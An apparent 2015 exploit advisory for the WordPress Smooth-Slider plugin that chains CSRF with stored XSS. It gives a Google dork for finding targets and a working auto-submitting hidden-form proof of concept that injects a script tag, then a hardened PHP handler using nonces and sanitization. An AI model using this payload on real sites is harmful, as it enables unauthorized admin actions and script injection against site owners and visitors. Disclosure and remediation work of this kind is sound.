Thursday, July 16, 2015

WordPress Plugin Smooth-Slider Multiple Exploits

############################################################
# Exploit Title: WordPress Plugin Smooth-Slider Multiple Exploits
# Google Dork: inurl:plugins/smooth-slider
# Date: 11-07-2015
# Exploit Author: bRpsd
# Vendor Homepage: https://wordpress.org/plugins/smooth-slider
# Version: 2.6.5 {latest} !
# Tested on: Windows 7,Linux
# Tested WordPress Version: WordPress 4.2.2 {latest} !
############################################################

Problem #1: Renaming a slider OR creating a new one doesn't require a [csrf] token / [wp_nonce] check, so the request can be forged from any site a logged-in admin visits.
Problem #2: The submitted slider title is not filtered or escaped, so a Cross Site Scripting payload is stored as-is!


So you can chain CSRF & stored XSS in the same request.
Vulnerable input: [rename_slider_to]


Proof-Of-Concept!
{HTML}

<p>Have a Nice Day ! (:</p>
<!-- hidden frame receives the response so the victim sees nothing -->
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://localhost/wordpress/wp-admin/admin.php?page=smooth-slider-admin' target="csrf-frame" id="csrf-form">
<!-- the unfiltered title field; JavaScript is case-sensitive, so alert() must be lowercase -->
<input name="rename_slider_to" type="hidden" value="XSS HERE<script>alert('t')</script>"/>
<input type='hidden' name='current_slider_id' value='1'>
<input type='hidden' name='rename_slider' value='Rename'>
<input type='hidden' name='active_tab' value='0'>
<input type='hidden' value='submit'>
</form>
<!-- auto-submit: no nonce is checked server-side, so the forged POST is accepted -->
<script>document.getElementById("csrf-form").submit()</script>




demo [test]:
http://www.exploit-id.com/ xD

==========================================================================
Solution : None yet from the vendor, but you can add your own [CSRF] token (a WordPress nonce) to the rename form, verify it in the handler, and sanitize the title before saving it.
==========================================================================
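What a fixed rename handler looks like, as an added example that is not the plugin's own code: the form carries a nonce bound to the slider id, the handler checks capability and nonce before touching anything, the title is sanitized on input and escaped on output. The function names, the nonce action/name and the option key are assumptions; the field names and the admin page slug are the ones from the PoC above.

```php
<?php
// Added example (not smooth-slider's code): hardened rename handler.
// ss_example_* function names and the option key are assumptions.

// 1) Render the form with a nonce tied to this specific slider.
function ss_example_render_rename_form( $slider_id, $current_title ) {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=smooth-slider-admin' ) ); ?>">
        <?php wp_nonce_field( 'ss_rename_slider_' . $slider_id, 'ss_rename_nonce' ); ?>
        <input type="hidden" name="current_slider_id" value="<?php echo esc_attr( $slider_id ); ?>">
        <input type="text" name="rename_slider_to" value="<?php echo esc_attr( $current_title ); ?>">
        <input type="submit" name="rename_slider" value="Rename">
    </form>
    <?php
}

// 2) Handle the POST: capability check, nonce check, then sanitize on input.
function ss_example_handle_rename() {
    if ( ! isset( $_POST['rename_slider'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    $slider_id = absint( $_POST['current_slider_id'] ?? 0 );
    // check_admin_referer() stops with a 403 when the nonce is missing, expired,
    // or was issued for a different slider id. This is what blocks the forged POST.
    check_admin_referer( 'ss_rename_slider_' . $slider_id, 'ss_rename_nonce' );

    // sanitize_text_field() strips tags, so "<script>" never reaches the database.
    $new_title = sanitize_text_field( wp_unslash( $_POST['rename_slider_to'] ?? '' ) );
    if ( '' === $new_title ) {
        wp_die( 'Slider title must not be empty.' );
    }
    update_option( 'ss_example_slider_title_' . $slider_id, $new_title );
}
add_action( 'admin_init', 'ss_example_handle_rename' );

// 3) Escape on output as well, so a title stored before the fix is rendered inert.
function ss_example_print_title( $slider_id ) {
    $title = get_option( 'ss_example_slider_title_' . $slider_id, '' );
    echo '<h2>' . esc_html( $title ) . '</h2>';
}
```

With the nonce in place the PoC form above is rejected with "The link you followed has expired" and never reaches the update, and even a title saved earlier is neutralised by esc_html() when displayed.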